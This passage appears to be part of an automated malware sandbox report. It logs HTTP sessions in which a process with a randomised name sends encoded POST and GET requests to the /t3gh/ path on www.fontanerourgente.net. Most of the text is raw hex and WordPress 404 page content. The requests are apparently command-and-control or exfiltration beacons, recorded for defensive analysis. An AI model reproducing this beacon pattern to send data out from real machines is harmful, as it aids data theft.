                                        Data Ascii: r8=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT56OY/ZB5wsYu+JAeEUx6KzjysqXqpfRGtQ=
                                        Sep 3, 2024 13:54:05.265578032 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:04 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:05.265598059 CEST224INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.ca
                                        Sep 3, 2024 13:54:05.265609026 CEST1236INData Raw: 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61
                                        Data Ascii: nvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width
                                        Sep 3, 2024 13:54:05.265614986 CEST224INData Raw: 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70
                                        Data Ascii: mojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JS
                                        Sep 3, 2024 13:54:05.265625000 CEST1236INData Raw: 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65
                                        Data Ascii: ON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Work
                                        Sep 3, 2024 13:54:05.265635967 CEST224INData Raw: 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d
                                        Data Ascii: ttings);</script><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                                        Sep 3, 2024 13:54:05.265652895 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                                        Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                                        Sep 3, 2024 13:54:05.265662909 CEST224INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                                        Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1e
                                        Sep 3, 2024 13:54:05.265672922 CEST1236INData Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                                        Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
                                        Sep 3, 2024 13:54:05.265683889 CEST224INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
                                        Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-
                                        Sep 3, 2024 13:54:05.265923023 CEST1236INData Raw: 70 61 72 74 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e
                                        Data Ascii: part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</style><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.44974437.187.158.211806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:06.732491970 CEST10869OUTPOST /t3gh/ HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.fontanerourgente.net
                                        Referer: http://www.fontanerourgente.net/t3gh/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 4a 54 50 6a 63 50 61 79 45 4a 59 37 72 69 2f 43 74 30 58 79 30 78 73 4b 58 71 6c 2f 36 41 43 57 57 32 61 6f 5a 4b 51 38 64 6f 78 53 56 31 36 79 44 6e 34 49 6e 77 74 6c 68 37 70 62 31 78 79 4a 6a 72 76 59 44 46 59 5a 65 63 55 61 34 4c 69 4b 71 53 44 54 50 70 4a 73 76 46 52 4a 54 50 42 70 46 79 69 59 2f 42 71 69 36 46 52 74 6b 67 38 64 70 45 6b 47 2f 43 72 31 7a 44 38 6c 58 53 76 2b 64 64 66 66 67 35 6e 53 30 6c 52 59 69 42 61 49 31 32 30 41 51 56 6b 4f 6c 43 65 42 45 33 6f 37 2f 61 70 39 48 6f 2f 35 65 54 58 70 70 39 41 4a 61 2b 64 44 56 75 41 53 64 48 38 30 70 75 36 47 7a 4f 38 4c 73 51 6a 4e 73 67 46 77 67 4a 45 43 6d 73 68 30 4b 68 66 67 42 61 65 73 69 52 59 69 37 44 62 76 4d 56 6b 53 49 66 68 61 48 50 58 4c 62 79 46 32 47 32 34 2f 5a 6b 57 41 44 7a 62 4b 31 6f 47 64 72 68 70 53 54 4e 38 4c 67 72 6d 51 74 65 5a 69 6d 50 74 4c 4f 31 62 70 58 4c 63 33 38 66 42 6e 37 [TRUNCATED]
                                        Data Ascii: r8=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxJTPjcPayEJY7ri/Ct0Xy0xsKXql/6ACWW2aoZKQ8doxSV16yDn4Inwtlh7pb1xyJjrvYDFYZecUa4LiKqSDTPpJsvFRJTPBpFyiY/Bqi6FRtkg8dpEkG/Cr1zD8lXSv+ddffg5nS0lRYiBaI120AQVkOlCeBE3o7/ap9Ho/5eTXpp9AJa+dDVuASdH80pu6GzO8LsQjNsgFwgJECmsh0KhfgBaesiRYi7DbvMVkSIfhaHPXLbyF2G24/ZkWADzbK1oGdrhpSTN8LgrmQteZimPtLO1bpXLc38fBn7s/VzAxFFw0gtjDSn1fLwSrQ1DPX1HmsCGL0U0VM1NaymNIMkyynYTMBf1tkjAxXpN83/BWwC92SUao/Y/ODSX7O/7Wqh63RtC6bkZ0gYRPy0/ZVo7s4OujFEdFm1UdJxXsYpafdamNlV+PxqKRTTs1+y8KtCaSM8FKNR7mSDEywyspHocJHH2F2ag3y59AGjdypbKoXDArESOv7FMGuyCfbCrR8LYQlC+90G1hU83sIMIQfJm6y8lH9YcbgSMMXmACPZB/1FiqUomAB1JuzXij7bwH+zCMdNgbLy2Br/WntWtO0q16ygDc7DAxtkI0z2AiWY0sCFrp60ENfQKyXJ04uSDSO4zQ6g8JfL9X8EwXD2rALid6rr9XmHoD/WX5Jt0rkEtsLO4A7RuPMBJhVjd3V4U7mDoSmJvtr07Yc00vJ+Wbh0VvWXn/jvzR/FeetMAW+I4zhWt0LGFqba1PKjPB3TCabXcMzr+U9pE4egB1fr7Gt5F+YfkEwCy+p+20kBsz8RnQNmAJuwvmpnb+iPxJHDcC39XwrVFyrIsRwNr//t5Rs5cNShgiMCUdwDNjmiXkO+qCJU1z6mHrvTfrOO8U9Y5ZufUxuuZznW+8/YT8BFb9zr168cM3n/XwglB0Q4nxty5D74nuSegnjgozttSiSOiHksK2UrnT [TRUNCATED]
                                        Sep 3, 2024 13:54:07.708841085 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:07 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:07.708879948 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                                        Sep 3, 2024 13:54:07.708893061 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                        Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                        Sep 3, 2024 13:54:07.708964109 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                                        Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                                        Sep 3, 2024 13:54:07.708975077 CEST1236INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                                        Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                                        Sep 3, 2024 13:54:07.708986998 CEST1120INData Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                                        Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                                        Sep 3, 2024 13:54:07.708998919 CEST1236INData Raw: 70 61 72 74 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 0a 3c 2f 73 74 79 6c 65 3e
                                        Data Ascii: part.has-background){margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</style><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;
                                        Sep 3, 2024 13:54:07.709011078 CEST1116INData Raw: 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 64 61 72 6b 2d 67 72 61 79 3a 20 23 32 38 33 30 33 44 3b 2d 2d 77
                                        Data Ascii: --preset--color--vivid-purple: #9b51e0;--wp--preset--color--dark-gray: #28303D;--wp--preset--color--gray: #39414D;--wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE4;--wp--preset--color--purple: #D1D1E4;--wp--preset--color--
                                        Sep 3, 2024 13:54:07.709079981 CEST1236INData Raw: 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d
                                        Data Ascii: 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(
                                        Sep 3, 2024 13:54:07.709139109 CEST1236INData Raw: 30 64 65 67 2c 20 23 45 45 45 41 44 44 20 30 25 2c 20 23 45 34 44 31 44 31 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 75 72 70 6c 65 2d 74 6f 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64
                                        Data Ascii: 0deg, #EEEADD 0%, #E4D1D1 100%);--wp--preset--gradient--purple-to-red: linear-gradient(160deg, #D1D1E4 0%, #E4D1D1 100%);--wp--preset--gradient--red-to-purple: linear-gradient(160deg, #E4D1D1 0%, #D1D1E4 100%);--wp--preset--font-size--small: 1
                                        Sep 3, 2024 13:54:07.714015961 CEST1236INData Raw: 7b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 7b 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c
                                        Data Ascii: {display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:wher


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.44974537.187.158.211806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:09.284306049 CEST490OUTGET /t3gh/?r8=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.fontanerourgente.net
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:10.176074028 CEST1236INHTTP/1.1 404 Not Found
                                        Date: Tue, 03 Sep 2024 11:54:09 GMT
                                        Server: Apache
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                        Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                        Sep 3, 2024 13:54:10.176091909 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                        Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
